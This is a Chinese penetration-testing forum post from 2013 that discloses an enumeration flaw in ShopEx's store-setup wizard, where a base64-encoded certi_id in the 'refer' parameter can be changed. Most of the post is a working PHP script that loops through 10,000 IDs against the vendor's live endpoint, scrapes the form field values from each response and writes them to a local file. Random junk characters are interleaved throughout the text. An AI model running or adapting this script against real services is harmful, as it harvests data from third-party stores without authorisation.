中国网络渗透测试联盟

标题: ShopEx某接口缺陷可遍历所有用户网站 [打印本页]
作者: admin    时间: 2013-9-21 15:59
标题: ShopEx某接口缺陷可遍历所有用户网站
简要描述:
" H4 F9 Y1 Q: V9 p$ fShopEx某接口缺陷,可遍历所有网站: q1 a' S. U% B/ w3 \& h
详细说明:
, h$ t' k9 D/ D1 C: ?问题出现在shopex 网店使用向导页面 , \# a! ^  _+ e, ~( G; b
" z' L* B& c) h: z

8 ^9 U2 {& A8 q3 d& [0 F( U1 z7 Y/ E
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=/ s1 n4 y6 ?# {7 q' J% t; \! Y5 Z

7 _% S( y" U: Y+ y8 H6 w8 D
& @2 R) y# V/ E' [# K8 L2 u- D4 e  O  v/ X; [+ L8 a
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
) u8 X; I+ A( W% G5 J2 l  q
# ?* L8 n$ T) I" [
7 V/ N! _( L: _: g0 Z7 z5 J9 w; s! ~  f1 w- u5 Z* ]3 K
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 9 o7 g* b! T# {4 z/ @- }

' r' X- z" C: F9 X& x* F1 F; a6 r# x0 l; E4 N  Z" |

5 H6 a! x$ h* F4 ^* X+ l<?php/ Y$ f$ m8 a9 T  G
: C- N6 z3 l  }* W# [# l4 F* r
                for ($i=1; $i < 10000; $i++) { //遍历
1 g$ s  I8 T, T8 j. Q+ `* \2 q( f; A  V6 [, F
                        ShowshopExD($i);  v+ q: ~5 q+ `. `( n$ S
& K9 Z8 J  v2 f
                }
" j2 c0 P! _1 G6 P+ Q
5 S3 Z$ j: n6 A9 v5 J1 S2 o                function ShowshopExD($cid) {
! w. _' v, D) c
! R* ~8 K: k7 u% t                $url='http://guide.ecos.shopex.cn/step2.php';
- K. ?% Q" I3 Q/ m; Z+ w" `( z% I' y& V! P/ I- P9 {0 p
                $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
5 C. a# c: c; P2 ]" e
, [4 U4 w, z2 ]* a1 n        $url = $url.'?refer='.$refer;7 V- o. z7 d, s* D( R9 D2 [
  D4 H* L9 w* n+ w
        $ch = curl_init($url);# t1 h/ V1 l% W: w. E- l
) [# F# `0 T, N1 b1 |
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;, Q/ q3 \6 w& L# y

; g+ ^, i; v! K  a% C9 P        curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
/ b; x/ }) Z6 h: w+ r( Y) j# h) Y+ F- b; d+ ^- h% N
        $result = curl_exec($ch);! Q' g! s- d% P8 g* T4 J: Z4 Y
; i$ n* O* m) J7 s. Z
        $result = mb_convert_encoding($result, "gb2312", "UTF-8");
# E9 K& n: Z: ]( K: k& u+ f* c4 W  Y1 D; `1 q' F
        if(strpos($result,$refer))
# h' j  C& Z8 g# F- C
; e) ]5 a- ?/ k$ r1 O/ U6 I        {
. J) h2 `6 w+ _9 G0 j' K0 Z3 s$ B( W! }) Y8 D/ E
                $fp = fopen("c:/shopEx.txt",'ab'); //保存文件4 E) D+ U% z! X7 J# w
8 A' W5 M; D0 i5 \6 S
                        preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);$ f0 T/ J1 q2 _$ b$ V
- V. c5 {0 U' R0 c9 d
                foreach ($value[1] as $key) {
) @9 }6 N" w7 K" z- S- w5 h: B; b! L$ i( W/ _
                        preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);# O* n( a/ W0 O

+ @3 y* _  ^; G6 `0 ^3 l2 e                        echo $res[1][0].':'.$res[3][0]."\r\n";2 n$ W8 r" f  ]

; F& C# O, G6 n' I" ^: q* E                        $col =$res[1][0].':'.$res[3][0]."\r\n"; ( m# H* f2 \6 M
/ H: t. t. C, V* m  o
                        fwrite($fp, $col, strlen($col)); : J/ k+ f6 T4 d% ^
% B9 L8 `) P/ d7 t
                }
$ j9 I- r7 J8 B3 k( x
# R* t6 M& Q7 ]( u' E$ o                echo '--------------------------------'."\r\n";6 }' @9 S9 H; X' y. `) f

( V' X/ M# Y5 N                fclose($fp);   l; n0 P4 _" {7 ~8 X9 g

% Y3 G+ |0 x5 o$ J        }' j* s$ U" B  E+ T: z$ ~' y
! ^! C& O+ q9 B$ ~
        flush();0 P8 i" S, }4 y- M; P2 u: `

7 U& w) X" p6 k" F/ [        curl_close($ch);6 c& @& ~& B# o: Z3 A
0 s, w9 [3 y  L
                }% `- H5 r. X& S1 x3 \

* G5 ~- T! b% G* S3 u2 E?>
- A' n6 P: K# H" s& b6 c漏洞证明:
' @  t0 s( u- j; Vhttp://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg! c# p: O% @/ Y* n9 d. r& D
refer换成其他加密方式
( r  |' ~6 P% [# o- g



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2